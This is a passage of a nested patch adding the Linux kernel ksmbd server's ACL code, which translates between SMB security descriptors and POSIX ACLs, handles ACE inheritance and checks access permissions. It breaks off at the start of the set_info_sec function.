++			acl_state.users->aces[acl_state.users->n].uid =
++				temp_fattr.cf_uid;
++			acl_state.users->aces[acl_state.users->n++].perms.allow =
++				((acl_mode & 0700) >> 6) | 0004;
++			default_acl_state.owner.allow = ((acl_mode & 0700) >> 6) | 0004;
++			default_acl_state.users->aces[default_acl_state.users->n].uid =
++				temp_fattr.cf_uid;
++			default_acl_state.users->aces[default_acl_state.users->n++].perms.allow =
++				((acl_mode & 0700) >> 6) | 0004;
++		}
++	}
++	kfree(ppace);
++
++	if (owner_found) {
++		/* The owner must be set to at least read-only. */
++		acl_state.owner.allow = ((mode & 0700) >> 6) | 0004;
++		acl_state.users->aces[acl_state.users->n].uid = fattr->cf_uid;
++		acl_state.users->aces[acl_state.users->n++].perms.allow =
++			((mode & 0700) >> 6) | 0004;
++		default_acl_state.owner.allow = ((mode & 0700) >> 6) | 0004;
++		default_acl_state.users->aces[default_acl_state.users->n].uid =
++			fattr->cf_uid;
++		default_acl_state.users->aces[default_acl_state.users->n++].perms.allow =
++			((mode & 0700) >> 6) | 0004;
++	}
++
++	if (group_found) {
++		acl_state.group.allow = (mode & 0070) >> 3;
++		acl_state.groups->aces[acl_state.groups->n].gid =
++			fattr->cf_gid;
++		acl_state.groups->aces[acl_state.groups->n++].perms.allow =
++			(mode & 0070) >> 3;
++		default_acl_state.group.allow = (mode & 0070) >> 3;
++		default_acl_state.groups->aces[default_acl_state.groups->n].gid =
++			fattr->cf_gid;
++		default_acl_state.groups->aces[default_acl_state.groups->n++].perms.allow =
++			(mode & 0070) >> 3;
++	}
++
++	if (others_found) {
++		fattr->cf_mode &= ~(0007);
++		fattr->cf_mode |= mode & 0007;
++
++		acl_state.other.allow = mode & 0007;
++		default_acl_state.other.allow = mode & 0007;
++	}
++
++	if (acl_state.users->n || acl_state.groups->n) {
++		acl_state.mask.allow = 0x07;
++
++		if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
++			fattr->cf_acls =
++				posix_acl_alloc(acl_state.users->n +
++					acl_state.groups->n + 4, GFP_KERNEL);
++			if (fattr->cf_acls) {
++				cf_pace = fattr->cf_acls->a_entries;
++				posix_state_to_acl(&acl_state, cf_pace);
++			}
++		}
++	}
++
++	if (default_acl_state.users->n || default_acl_state.groups->n) {
++		default_acl_state.mask.allow = 0x07;
++
++		if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
++			fattr->cf_dacls =
++				posix_acl_alloc(default_acl_state.users->n +
++				default_acl_state.groups->n + 4, GFP_KERNEL);
++			if (fattr->cf_dacls) {
++				cf_pdace = fattr->cf_dacls->a_entries;
++				posix_state_to_acl(&default_acl_state, cf_pdace);
++			}
++		}
++	}
++	free_acl_state(&acl_state);
++	free_acl_state(&default_acl_state);
++}
++
++static void set_posix_acl_entries_dacl(struct user_namespace *user_ns,
++				       struct smb_ace *pndace,
++				       struct smb_fattr *fattr, u32 *num_aces,
++				       u16 *size, u32 nt_aces_num)
++{
++	struct posix_acl_entry *pace;
++	struct smb_sid *sid;
++	struct smb_ace *ntace;
++	int i, j;
++
++	if (!fattr->cf_acls)
++		goto posix_default_acl;
++
++	pace = fattr->cf_acls->a_entries;
++	for (i = 0; i < fattr->cf_acls->a_count; i++, pace++) {
++		int flags = 0;
++
++		sid = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
++		if (!sid)
++			break;
++
++		if (pace->e_tag == ACL_USER) {
++			uid_t uid;
++			unsigned int sid_type = SIDOWNER;
++
++			uid = posix_acl_uid_translate(user_ns, pace);
++			if (!uid)
++				sid_type = SIDUNIX_USER;
++			id_to_sid(uid, sid_type, sid);
++		} else if (pace->e_tag == ACL_GROUP) {
++			gid_t gid;
++
++			gid = posix_acl_gid_translate(user_ns, pace);
++			id_to_sid(gid, SIDUNIX_GROUP, sid);
++		} else if (pace->e_tag == ACL_OTHER && !nt_aces_num) {
++			smb_copy_sid(sid, &sid_everyone);
++		} else {
++			kfree(sid);
++			continue;
++		}
++		ntace = pndace;
++		for (j = 0; j < nt_aces_num; j++) {
++			if (ntace->sid.sub_auth[ntace->sid.num_subauth - 1] ==
++					sid->sub_auth[sid->num_subauth - 1])
++				goto pass_same_sid;
++			ntace = (struct smb_ace *)((char *)ntace +
++					le16_to_cpu(ntace->size));
++		}
++
++		if (S_ISDIR(fattr->cf_mode) && pace->e_tag == ACL_OTHER)
++			flags = 0x03;
++
++		ntace = (struct smb_ace *)((char *)pndace + *size);
++		*size += fill_ace_for_sid(ntace, sid, ACCESS_ALLOWED, flags,
++				pace->e_perm, 0777);
++		(*num_aces)++;
++		if (pace->e_tag == ACL_USER)
++			ntace->access_req |=
++				FILE_DELETE_LE | FILE_DELETE_CHILD_LE;
++
++		if (S_ISDIR(fattr->cf_mode) &&
++		    (pace->e_tag == ACL_USER || pace->e_tag == ACL_GROUP)) {
++			ntace = (struct smb_ace *)((char *)pndace + *size);
++			*size += fill_ace_for_sid(ntace, sid, ACCESS_ALLOWED,
++					0x03, pace->e_perm, 0777);
++			(*num_aces)++;
++			if (pace->e_tag == ACL_USER)
++				ntace->access_req |=
++					FILE_DELETE_LE | FILE_DELETE_CHILD_LE;
++		}
++
++pass_same_sid:
++		kfree(sid);
++	}
++
++	if (nt_aces_num)
++		return;
++
++posix_default_acl:
++	if (!fattr->cf_dacls)
++		return;
++
++	pace = fattr->cf_dacls->a_entries;
++	for (i = 0; i < fattr->cf_dacls->a_count; i++, pace++) {
++		sid = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
++		if (!sid)
++			break;
++
++		if (pace->e_tag == ACL_USER) {
++			uid_t uid;
++
++			uid = posix_acl_uid_translate(user_ns, pace);
++			id_to_sid(uid, SIDCREATOR_OWNER, sid);
++		} else if (pace->e_tag == ACL_GROUP) {
++			gid_t gid;
++
++			gid = posix_acl_gid_translate(user_ns, pace);
++			id_to_sid(gid, SIDCREATOR_GROUP, sid);
++		} else {
++			kfree(sid);
++			continue;
++		}
++
++		ntace = (struct smb_ace *)((char *)pndace + *size);
++		*size += fill_ace_for_sid(ntace, sid, ACCESS_ALLOWED, 0x0b,
++				pace->e_perm, 0777);
++		(*num_aces)++;
++		if (pace->e_tag == ACL_USER)
++			ntace->access_req |=
++				FILE_DELETE_LE | FILE_DELETE_CHILD_LE;
++		kfree(sid);
++	}
++}
++
++static void set_ntacl_dacl(struct user_namespace *user_ns,
++			   struct smb_acl *pndacl,
++			   struct smb_acl *nt_dacl,
++			   unsigned int aces_size,
++			   const struct smb_sid *pownersid,
++			   const struct smb_sid *pgrpsid,
++			   struct smb_fattr *fattr)
++{
++	struct smb_ace *ntace, *pndace;
++	int nt_num_aces = le32_to_cpu(nt_dacl->num_aces), num_aces = 0;
++	unsigned short size = 0;
++	int i;
++
++	pndace = (struct smb_ace *)((char *)pndacl + sizeof(struct smb_acl));
++	if (nt_num_aces) {
++		ntace = (struct smb_ace *)((char *)nt_dacl + sizeof(struct smb_acl));
++		for (i = 0; i < nt_num_aces; i++) {
++			unsigned short nt_ace_size;
++
++			if (offsetof(struct smb_ace, access_req) > aces_size)
++				break;
++
++			nt_ace_size = le16_to_cpu(ntace->size);
++			if (nt_ace_size > aces_size)
++				break;
++
++			memcpy((char *)pndace + size, ntace, nt_ace_size);
++			size += nt_ace_size;
++			aces_size -= nt_ace_size;
++			ntace = (struct smb_ace *)((char *)ntace + nt_ace_size);
++			num_aces++;
++		}
++	}
++
++	set_posix_acl_entries_dacl(user_ns, pndace, fattr,
++				   &num_aces, &size, nt_num_aces);
++	pndacl->num_aces = cpu_to_le32(num_aces);
++	pndacl->size = cpu_to_le16(le16_to_cpu(pndacl->size) + size);
++}
++
++static void set_mode_dacl(struct user_namespace *user_ns,
++			  struct smb_acl *pndacl, struct smb_fattr *fattr)
++{
++	struct smb_ace *pace, *pndace;
++	u32 num_aces = 0;
++	u16 size = 0, ace_size = 0;
++	uid_t uid;
++	const struct smb_sid *sid;
++
++	pace = pndace = (struct smb_ace *)((char *)pndacl + sizeof(struct smb_acl));
++
++	if (fattr->cf_acls) {
++		set_posix_acl_entries_dacl(user_ns, pndace, fattr,
++					   &num_aces, &size, num_aces);
++		goto out;
++	}
++
++	/* owner RID */
++	uid = from_kuid(&init_user_ns, fattr->cf_uid);
++	if (uid)
++		sid = &server_conf.domain_sid;
++	else
++		sid = &sid_unix_users;
++	ace_size = fill_ace_for_sid(pace, sid, ACCESS_ALLOWED, 0,
++				    fattr->cf_mode, 0700);
++	pace->sid.sub_auth[pace->sid.num_subauth++] = cpu_to_le32(uid);
++	pace->size = cpu_to_le16(ace_size + 4);
++	size += le16_to_cpu(pace->size);
++	pace = (struct smb_ace *)((char *)pndace + size);
++
++	/* Group RID */
++	ace_size = fill_ace_for_sid(pace, &sid_unix_groups,
++				    ACCESS_ALLOWED, 0, fattr->cf_mode, 0070);
++	pace->sid.sub_auth[pace->sid.num_subauth++] =
++		cpu_to_le32(from_kgid(&init_user_ns, fattr->cf_gid));
++	pace->size = cpu_to_le16(ace_size + 4);
++	size += le16_to_cpu(pace->size);
++	pace = (struct smb_ace *)((char *)pndace + size);
++	num_aces = 3;
++
++	if (S_ISDIR(fattr->cf_mode)) {
++		pace = (struct smb_ace *)((char *)pndace + size);
++
++		/* creator owner */
++		size += fill_ace_for_sid(pace, &creator_owner, ACCESS_ALLOWED,
++					 0x0b, fattr->cf_mode, 0700);
++		pace = (struct smb_ace *)((char *)pndace + size);
++
++		/* creator group */
++		size += fill_ace_for_sid(pace, &creator_group, ACCESS_ALLOWED,
++					 0x0b, fattr->cf_mode, 0070);
++		pace = (struct smb_ace *)((char *)pndace + size);
++		num_aces = 5;
++	}
++
++	/* other */
++	size += fill_ace_for_sid(pace, &sid_everyone, ACCESS_ALLOWED, 0,
++				 fattr->cf_mode, 0007);
++
++out:
++	pndacl->num_aces = cpu_to_le32(num_aces);
++	pndacl->size = cpu_to_le16(le16_to_cpu(pndacl->size) + size);
++}
++
++static int parse_sid(struct smb_sid *psid, char *end_of_acl)
++{
++	/*
++	 * validate that we do not go past end of ACL - sid must be at least 8
++	 * bytes long (assuming no sub-auths - e.g. the null SID
++	 */
++	if (end_of_acl < (char *)psid + 8) {
++		pr_err("ACL too small to parse SID %p\n", psid);
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++/* Convert CIFS ACL to POSIX form */
++int parse_sec_desc(struct user_namespace *user_ns, struct smb_ntsd *pntsd,
++		   int acl_len, struct smb_fattr *fattr)
++{
++	int rc = 0;
++	struct smb_sid *owner_sid_ptr, *group_sid_ptr;
++	struct smb_acl *dacl_ptr; /* no need for SACL ptr */
++	char *end_of_acl = ((char *)pntsd) + acl_len;
++	__u32 dacloffset;
++	int pntsd_type;
++
++	if (!pntsd)
++		return -EIO;
++
++	if (acl_len < sizeof(struct smb_ntsd))
++		return -EINVAL;
++
++	owner_sid_ptr = (struct smb_sid *)((char *)pntsd +
++			le32_to_cpu(pntsd->osidoffset));
++	group_sid_ptr = (struct smb_sid *)((char *)pntsd +
++			le32_to_cpu(pntsd->gsidoffset));
++	dacloffset = le32_to_cpu(pntsd->dacloffset);
++	dacl_ptr = (struct smb_acl *)((char *)pntsd + dacloffset);
++	ksmbd_debug(SMB,
++		    "revision %d type 0x%x ooffset 0x%x goffset 0x%x sacloffset 0x%x dacloffset 0x%x\n",
++		    pntsd->revision, pntsd->type, le32_to_cpu(pntsd->osidoffset),
++		    le32_to_cpu(pntsd->gsidoffset),
++		    le32_to_cpu(pntsd->sacloffset), dacloffset);
++
++	pntsd_type = le16_to_cpu(pntsd->type);
++	if (!(pntsd_type & DACL_PRESENT)) {
++		ksmbd_debug(SMB, "DACL_PRESENT in DACL type is not set\n");
++		return rc;
++	}
++
++	pntsd->type = cpu_to_le16(DACL_PRESENT);
++
++	if (pntsd->osidoffset) {
++		rc = parse_sid(owner_sid_ptr, end_of_acl);
++		if (rc) {
++			pr_err("%s: Error %d parsing Owner SID\n", __func__, rc);
++			return rc;
++		}
++
++		rc = sid_to_id(user_ns, owner_sid_ptr, SIDOWNER, fattr);
++		if (rc) {
++			pr_err("%s: Error %d mapping Owner SID to uid\n",
++			       __func__, rc);
++			owner_sid_ptr = NULL;
++		}
++	}
++
++	if (pntsd->gsidoffset) {
++		rc = parse_sid(group_sid_ptr, end_of_acl);
++		if (rc) {
++			pr_err("%s: Error %d mapping Owner SID to gid\n",
++			       __func__, rc);
++			return rc;
++		}
++		rc = sid_to_id(user_ns, group_sid_ptr, SIDUNIX_GROUP, fattr);
++		if (rc) {
++			pr_err("%s: Error %d mapping Group SID to gid\n",
++			       __func__, rc);
++			group_sid_ptr = NULL;
++		}
++	}
++
++	if ((pntsd_type & (DACL_AUTO_INHERITED | DACL_AUTO_INHERIT_REQ)) ==
++	    (DACL_AUTO_INHERITED | DACL_AUTO_INHERIT_REQ))
++		pntsd->type |= cpu_to_le16(DACL_AUTO_INHERITED);
++	if (pntsd_type & DACL_PROTECTED)
++		pntsd->type |= cpu_to_le16(DACL_PROTECTED);
++
++	if (dacloffset) {
++		parse_dacl(user_ns, dacl_ptr, end_of_acl,
++			   owner_sid_ptr, group_sid_ptr, fattr);
++	}
++
++	return 0;
++}
++
++/* Convert permission bits from mode to equivalent CIFS ACL */
++int build_sec_desc(struct user_namespace *user_ns,
++		   struct smb_ntsd *pntsd, struct smb_ntsd *ppntsd,
++		   int ppntsd_size, int addition_info, __u32 *secdesclen,
++		   struct smb_fattr *fattr)
++{
++	int rc = 0;
++	__u32 offset;
++	struct smb_sid *owner_sid_ptr, *group_sid_ptr;
++	struct smb_sid *nowner_sid_ptr, *ngroup_sid_ptr;
++	struct smb_acl *dacl_ptr = NULL; /* no need for SACL ptr */
++	uid_t uid;
++	gid_t gid;
++	unsigned int sid_type = SIDOWNER;
++
++	nowner_sid_ptr = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
++	if (!nowner_sid_ptr)
++		return -ENOMEM;
++
++	uid = from_kuid(&init_user_ns, fattr->cf_uid);
++	if (!uid)
++		sid_type = SIDUNIX_USER;
++	id_to_sid(uid, sid_type, nowner_sid_ptr);
++
++	ngroup_sid_ptr = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
++	if (!ngroup_sid_ptr) {
++		kfree(nowner_sid_ptr);
++		return -ENOMEM;
++	}
++
++	gid = from_kgid(&init_user_ns, fattr->cf_gid);
++	id_to_sid(gid, SIDUNIX_GROUP, ngroup_sid_ptr);
++
++	offset = sizeof(struct smb_ntsd);
++	pntsd->sacloffset = 0;
++	pntsd->revision = cpu_to_le16(1);
++	pntsd->type = cpu_to_le16(SELF_RELATIVE);
++	if (ppntsd)
++		pntsd->type |= ppntsd->type;
++
++	if (addition_info & OWNER_SECINFO) {
++		pntsd->osidoffset = cpu_to_le32(offset);
++		owner_sid_ptr = (struct smb_sid *)((char *)pntsd + offset);
++		smb_copy_sid(owner_sid_ptr, nowner_sid_ptr);
++		offset += 1 + 1 + 6 + (nowner_sid_ptr->num_subauth * 4);
++	}
++
++	if (addition_info & GROUP_SECINFO) {
++		pntsd->gsidoffset = cpu_to_le32(offset);
++		group_sid_ptr = (struct smb_sid *)((char *)pntsd + offset);
++		smb_copy_sid(group_sid_ptr, ngroup_sid_ptr);
++		offset += 1 + 1 + 6 + (ngroup_sid_ptr->num_subauth * 4);
++	}
++
++	if (addition_info & DACL_SECINFO) {
++		pntsd->type |= cpu_to_le16(DACL_PRESENT);
++		dacl_ptr = (struct smb_acl *)((char *)pntsd + offset);
++		dacl_ptr->revision = cpu_to_le16(2);
++		dacl_ptr->size = cpu_to_le16(sizeof(struct smb_acl));
++		dacl_ptr->num_aces = 0;
++
++		if (!ppntsd) {
++			set_mode_dacl(user_ns, dacl_ptr, fattr);
++		} else {
++			struct smb_acl *ppdacl_ptr;
++			unsigned int dacl_offset = le32_to_cpu(ppntsd->dacloffset);
++			int ppdacl_size, ntacl_size = ppntsd_size - dacl_offset;
++
++			if (!dacl_offset ||
++			    (dacl_offset + sizeof(struct smb_acl) > ppntsd_size))
++				goto out;
++
++			ppdacl_ptr = (struct smb_acl *)((char *)ppntsd + dacl_offset);
++			ppdacl_size = le16_to_cpu(ppdacl_ptr->size);
++			if (ppdacl_size > ntacl_size ||
++			    ppdacl_size < sizeof(struct smb_acl))
++				goto out;
++
++			set_ntacl_dacl(user_ns, dacl_ptr, ppdacl_ptr,
++				       ntacl_size - sizeof(struct smb_acl),
++				       nowner_sid_ptr, ngroup_sid_ptr,
++				       fattr);
++		}
++		pntsd->dacloffset = cpu_to_le32(offset);
++		offset += le16_to_cpu(dacl_ptr->size);
++	}
++
++out:
++	kfree(nowner_sid_ptr);
++	kfree(ngroup_sid_ptr);
++	*secdesclen = offset;
++	return rc;
++}
++
++static void smb_set_ace(struct smb_ace *ace, const struct smb_sid *sid, u8 type,
++			u8 flags, __le32 access_req)
++{
++	ace->type = type;
++	ace->flags = flags;
++	ace->access_req = access_req;
++	smb_copy_sid(&ace->sid, sid);
++	ace->size = cpu_to_le16(1 + 1 + 2 + 4 + 1 + 1 + 6 + (sid->num_subauth * 4));
++}
++
++int smb_inherit_dacl(struct ksmbd_conn *conn,
++		     const struct path *path,
++		     unsigned int uid, unsigned int gid)
++{
++	const struct smb_sid *psid, *creator = NULL;
++	struct smb_ace *parent_aces, *aces;
++	struct smb_acl *parent_pdacl;
++	struct smb_ntsd *parent_pntsd = NULL;
++	struct smb_sid owner_sid, group_sid;
++	struct dentry *parent = path->dentry->d_parent;
++	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
++	int inherited_flags = 0, flags = 0, i, ace_cnt = 0, nt_size = 0, pdacl_size;
++	int rc = 0, num_aces, dacloffset, pntsd_type, pntsd_size, acl_len, aces_size;
++	char *aces_base;
++	bool is_dir = S_ISDIR(d_inode(path->dentry)->i_mode);
++
++	pntsd_size = ksmbd_vfs_get_sd_xattr(conn, user_ns,
++					    parent, &parent_pntsd);
++	if (pntsd_size <= 0)
++		return -ENOENT;
++	dacloffset = le32_to_cpu(parent_pntsd->dacloffset);
++	if (!dacloffset || (dacloffset + sizeof(struct smb_acl) > pntsd_size)) {
++		rc = -EINVAL;
++		goto free_parent_pntsd;
++	}
++
++	parent_pdacl = (struct smb_acl *)((char *)parent_pntsd + dacloffset);
++	acl_len = pntsd_size - dacloffset;
++	num_aces = le32_to_cpu(parent_pdacl->num_aces);
++	pntsd_type = le16_to_cpu(parent_pntsd->type);
++	pdacl_size = le16_to_cpu(parent_pdacl->size);
++
++	if (pdacl_size > acl_len || pdacl_size < sizeof(struct smb_acl)) {
++		rc = -EINVAL;
++		goto free_parent_pntsd;
++	}
++
++	aces_base = kmalloc(sizeof(struct smb_ace) * num_aces * 2, GFP_KERNEL);
++	if (!aces_base) {
++		rc = -ENOMEM;
++		goto free_parent_pntsd;
++	}
++
++	aces = (struct smb_ace *)aces_base;
++	parent_aces = (struct smb_ace *)((char *)parent_pdacl +
++			sizeof(struct smb_acl));
++	aces_size = acl_len - sizeof(struct smb_acl);
++
++	if (pntsd_type & DACL_AUTO_INHERITED)
++		inherited_flags = INHERITED_ACE;
++
++	for (i = 0; i < num_aces; i++) {
++		int pace_size;
++
++		if (offsetof(struct smb_ace, access_req) > aces_size)
++			break;
++
++		pace_size = le16_to_cpu(parent_aces->size);
++		if (pace_size > aces_size)
++			break;
++
++		aces_size -= pace_size;
++
++		flags = parent_aces->flags;
++		if (!smb_inherit_flags(flags, is_dir))
++			goto pass;
++		if (is_dir) {
++			flags &= ~(INHERIT_ONLY_ACE | INHERITED_ACE);
++			if (!(flags & CONTAINER_INHERIT_ACE))
++				flags |= INHERIT_ONLY_ACE;
++			if (flags & NO_PROPAGATE_INHERIT_ACE)
++				flags = 0;
++		} else {
++			flags = 0;
++		}
++
++		if (!compare_sids(&creator_owner, &parent_aces->sid)) {
++			creator = &creator_owner;
++			id_to_sid(uid, SIDOWNER, &owner_sid);
++			psid = &owner_sid;
++		} else if (!compare_sids(&creator_group, &parent_aces->sid)) {
++			creator = &creator_group;
++			id_to_sid(gid, SIDUNIX_GROUP, &group_sid);
++			psid = &group_sid;
++		} else {
++			creator = NULL;
++			psid = &parent_aces->sid;
++		}
++
++		if (is_dir && creator && flags & CONTAINER_INHERIT_ACE) {
++			smb_set_ace(aces, psid, parent_aces->type, inherited_flags,
++				    parent_aces->access_req);
++			nt_size += le16_to_cpu(aces->size);
++			ace_cnt++;
++			aces = (struct smb_ace *)((char *)aces + le16_to_cpu(aces->size));
++			flags |= INHERIT_ONLY_ACE;
++			psid = creator;
++		} else if (is_dir && !(parent_aces->flags & NO_PROPAGATE_INHERIT_ACE)) {
++			psid = &parent_aces->sid;
++		}
++
++		smb_set_ace(aces, psid, parent_aces->type, flags | inherited_flags,
++			    parent_aces->access_req);
++		nt_size += le16_to_cpu(aces->size);
++		aces = (struct smb_ace *)((char *)aces + le16_to_cpu(aces->size));
++		ace_cnt++;
++pass:
++		parent_aces = (struct smb_ace *)((char *)parent_aces + pace_size);
++	}
++
++	if (nt_size > 0) {
++		struct smb_ntsd *pntsd;
++		struct smb_acl *pdacl;
++		struct smb_sid *powner_sid = NULL, *pgroup_sid = NULL;
++		int powner_sid_size = 0, pgroup_sid_size = 0, pntsd_size;
++
++		if (parent_pntsd->osidoffset) {
++			powner_sid = (struct smb_sid *)((char *)parent_pntsd +
++					le32_to_cpu(parent_pntsd->osidoffset));
++			powner_sid_size = 1 + 1 + 6 + (powner_sid->num_subauth * 4);
++		}
++		if (parent_pntsd->gsidoffset) {
++			pgroup_sid = (struct smb_sid *)((char *)parent_pntsd +
++					le32_to_cpu(parent_pntsd->gsidoffset));
++			pgroup_sid_size = 1 + 1 + 6 + (pgroup_sid->num_subauth * 4);
++		}
++
++		pntsd = kzalloc(sizeof(struct smb_ntsd) + powner_sid_size +
++				pgroup_sid_size + sizeof(struct smb_acl) +
++				nt_size, GFP_KERNEL);
++		if (!pntsd) {
++			rc = -ENOMEM;
++			goto free_aces_base;
++		}
++
++		pntsd->revision = cpu_to_le16(1);
++		pntsd->type = cpu_to_le16(SELF_RELATIVE | DACL_PRESENT);
++		if (le16_to_cpu(parent_pntsd->type) & DACL_AUTO_INHERITED)
++			pntsd->type |= cpu_to_le16(DACL_AUTO_INHERITED);
++		pntsd_size = sizeof(struct smb_ntsd);
++		pntsd->osidoffset = parent_pntsd->osidoffset;
++		pntsd->gsidoffset = parent_pntsd->gsidoffset;
++		pntsd->dacloffset = parent_pntsd->dacloffset;
++
++		if (pntsd->osidoffset) {
++			struct smb_sid *owner_sid = (struct smb_sid *)((char *)pntsd +
++					le32_to_cpu(pntsd->osidoffset));
++			memcpy(owner_sid, powner_sid, powner_sid_size);
++			pntsd_size += powner_sid_size;
++		}
++
++		if (pntsd->gsidoffset) {
++			struct smb_sid *group_sid = (struct smb_sid *)((char *)pntsd +
++					le32_to_cpu(pntsd->gsidoffset));
++			memcpy(group_sid, pgroup_sid, pgroup_sid_size);
++			pntsd_size += pgroup_sid_size;
++		}
++
++		if (pntsd->dacloffset) {
++			struct smb_ace *pace;
++
++			pdacl = (struct smb_acl *)((char *)pntsd + le32_to_cpu(pntsd->dacloffset));
++			pdacl->revision = cpu_to_le16(2);
++			pdacl->size = cpu_to_le16(sizeof(struct smb_acl) + nt_size);
++			pdacl->num_aces = cpu_to_le32(ace_cnt);
++			pace = (struct smb_ace *)((char *)pdacl + sizeof(struct smb_acl));
++			memcpy(pace, aces_base, nt_size);
++			pntsd_size += sizeof(struct smb_acl) + nt_size;
++		}
++
++		ksmbd_vfs_set_sd_xattr(conn, user_ns,
++				       path->dentry, pntsd, pntsd_size);
++		kfree(pntsd);
++	}
++
++free_aces_base:
++	kfree(aces_base);
++free_parent_pntsd:
++	kfree(parent_pntsd);
++	return rc;
++}
++
++bool smb_inherit_flags(int flags, bool is_dir)
++{
++	if (!is_dir)
++		return (flags & OBJECT_INHERIT_ACE) != 0;
++
++	if (flags & OBJECT_INHERIT_ACE && !(flags & NO_PROPAGATE_INHERIT_ACE))
++		return true;
++
++	if (flags & CONTAINER_INHERIT_ACE)
++		return true;
++	return false;
++}
++
++int smb_check_perm_dacl(struct ksmbd_conn *conn, const struct path *path,
++			__le32 *pdaccess, int uid)
++{
++	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
++	struct smb_ntsd *pntsd = NULL;
++	struct smb_acl *pdacl;
++	struct posix_acl *posix_acls;
++	int rc = 0, pntsd_size, acl_size, aces_size, pdacl_size, dacl_offset;
++	struct smb_sid sid;
++	int granted = le32_to_cpu(*pdaccess & ~FILE_MAXIMAL_ACCESS_LE);
++	struct smb_ace *ace;
++	int i, found = 0;
++	unsigned int access_bits = 0;
++	struct smb_ace *others_ace = NULL;
++	struct posix_acl_entry *pa_entry;
++	unsigned int sid_type = SIDOWNER;
++	unsigned short ace_size;
++
++	ksmbd_debug(SMB, "check permission using windows acl\n");
++	pntsd_size = ksmbd_vfs_get_sd_xattr(conn, user_ns,
++					    path->dentry, &pntsd);
++	if (pntsd_size <= 0 || !pntsd)
++		goto err_out;
++
++	dacl_offset = le32_to_cpu(pntsd->dacloffset);
++	if (!dacl_offset ||
++	    (dacl_offset + sizeof(struct smb_acl) > pntsd_size))
++		goto err_out;
++
++	pdacl = (struct smb_acl *)((char *)pntsd + le32_to_cpu(pntsd->dacloffset));
++	acl_size = pntsd_size - dacl_offset;
++	pdacl_size = le16_to_cpu(pdacl->size);
++
++	if (pdacl_size > acl_size || pdacl_size < sizeof(struct smb_acl))
++		goto err_out;
++
++	if (!pdacl->num_aces) {
++		if (!(pdacl_size - sizeof(struct smb_acl)) &&
++		    *pdaccess & ~(FILE_READ_CONTROL_LE | FILE_WRITE_DAC_LE)) {
++			rc = -EACCES;
++			goto err_out;
++		}
++		goto err_out;
++	}
++
++	if (*pdaccess & FILE_MAXIMAL_ACCESS_LE) {
++		granted = READ_CONTROL | WRITE_DAC | FILE_READ_ATTRIBUTES |
++			DELETE;
++
++		ace = (struct smb_ace *)((char *)pdacl + sizeof(struct smb_acl));
++		aces_size = acl_size - sizeof(struct smb_acl);
++		for (i = 0; i < le32_to_cpu(pdacl->num_aces); i++) {
++			if (offsetof(struct smb_ace, access_req) > aces_size)
++				break;
++			ace_size = le16_to_cpu(ace->size);
++			if (ace_size > aces_size)
++				break;
++			aces_size -= ace_size;
++			granted |= le32_to_cpu(ace->access_req);
++			ace = (struct smb_ace *)((char *)ace + le16_to_cpu(ace->size));
++		}
++
++		if (!pdacl->num_aces)
++			granted = GENERIC_ALL_FLAGS;
++	}
++
++	if (!uid)
++		sid_type = SIDUNIX_USER;
++	id_to_sid(uid, sid_type, &sid);
++
++	ace = (struct smb_ace *)((char *)pdacl + sizeof(struct smb_acl));
++	aces_size = acl_size - sizeof(struct smb_acl);
++	for (i = 0; i < le32_to_cpu(pdacl->num_aces); i++) {
++		if (offsetof(struct smb_ace, access_req) > aces_size)
++			break;
++		ace_size = le16_to_cpu(ace->size);
++		if (ace_size > aces_size)
++			break;
++		aces_size -= ace_size;
++
++		if (!compare_sids(&sid, &ace->sid) ||
++		    !compare_sids(&sid_unix_NFS_mode, &ace->sid)) {
++			found = 1;
++			break;
++		}
++		if (!compare_sids(&sid_everyone, &ace->sid))
++			others_ace = ace;
++
++		ace = (struct smb_ace *)((char *)ace + le16_to_cpu(ace->size));
++	}
++
++	if (*pdaccess & FILE_MAXIMAL_ACCESS_LE && found) {
++		granted = READ_CONTROL | WRITE_DAC | FILE_READ_ATTRIBUTES |
++			DELETE;
++
++		granted |= le32_to_cpu(ace->access_req);
++
++		if (!pdacl->num_aces)
++			granted = GENERIC_ALL_FLAGS;
++	}
++
++	if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
++		posix_acls = get_acl(d_inode(path->dentry), ACL_TYPE_ACCESS);
++		if (posix_acls && !found) {
++			unsigned int id = -1;
++
++			pa_entry = posix_acls->a_entries;
++			for (i = 0; i < posix_acls->a_count; i++, pa_entry++) {
++				if (pa_entry->e_tag == ACL_USER)
++					id = posix_acl_uid_translate(user_ns, pa_entry);
++				else if (pa_entry->e_tag == ACL_GROUP)
++					id = posix_acl_gid_translate(user_ns, pa_entry);
++				else
++					continue;
++
++				if (id == uid) {
++					mode_to_access_flags(pa_entry->e_perm,
++							     0777,
++							     &access_bits);
++					if (!access_bits)
++						access_bits =
++							SET_MINIMUM_RIGHTS;
++					posix_acl_release(posix_acls);
++					goto check_access_bits;
++				}
++			}
++		}
++		if (posix_acls)
++			posix_acl_release(posix_acls);
++	}
++
++	if (!found) {
++		if (others_ace) {
++			ace = others_ace;
++		} else {
++			ksmbd_debug(SMB, "Can't find corresponding sid\n");
++			rc = -EACCES;
++			goto err_out;
++		}
++	}
++
++	switch (ace->type) {
++	case ACCESS_ALLOWED_ACE_TYPE:
++		access_bits = le32_to_cpu(ace->access_req);
++		break;
++	case ACCESS_DENIED_ACE_TYPE:
++	case ACCESS_DENIED_CALLBACK_ACE_TYPE:
++		access_bits = le32_to_cpu(~ace->access_req);
++		break;
++	}
++
++check_access_bits:
++	if (granted &
++	    ~(access_bits | FILE_READ_ATTRIBUTES | READ_CONTROL | WRITE_DAC | DELETE)) {
++		ksmbd_debug(SMB, "Access denied with winACL, granted : %x, access_req : %x\n",
++			    granted, le32_to_cpu(ace->access_req));
++		rc = -EACCES;
++		goto err_out;
++	}
++
++	*pdaccess = cpu_to_le32(granted);
++err_out:
++	kfree(pntsd);
++	return rc;
++}
++
++int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
++		 const struct path *path, struct smb_ntsd *pntsd, int ntsd_len,
++		 bool type_check)
++{
++	int rc;
++	struct smb_fattr fattr = {{0}};
++	struct inode *inode = d_inode(path->dentry);
